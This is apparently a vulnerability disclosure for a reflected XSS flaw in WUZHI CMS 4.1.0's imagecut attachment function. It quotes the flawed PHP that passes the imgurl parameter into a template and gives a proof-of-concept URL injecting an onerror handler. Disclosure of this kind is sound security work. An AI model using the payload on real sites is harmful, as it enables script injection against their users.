A xss vulnerability was discovered in WUZHI CMS 4.1.0
There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the imgurl parameter of /index.php?m=attachment&f=imagecut&v=init
Vulnerability file: coreframe/app/attachment/imagecut.php
function init() {
if(isset($GLOBALS['imgBase64'])) {
......
} else {
if(!empty($GLOBALS['imgurl'])) {
$imgurl = urldecode($GLOBALS['imgurl']);
}
include T('attachment','imagecut');
}
}
PoC:
http://example.com/index.php?m=attachment&f=imagecut&v=init&imgurl=1"+onerror%3d"alert(1)%3b//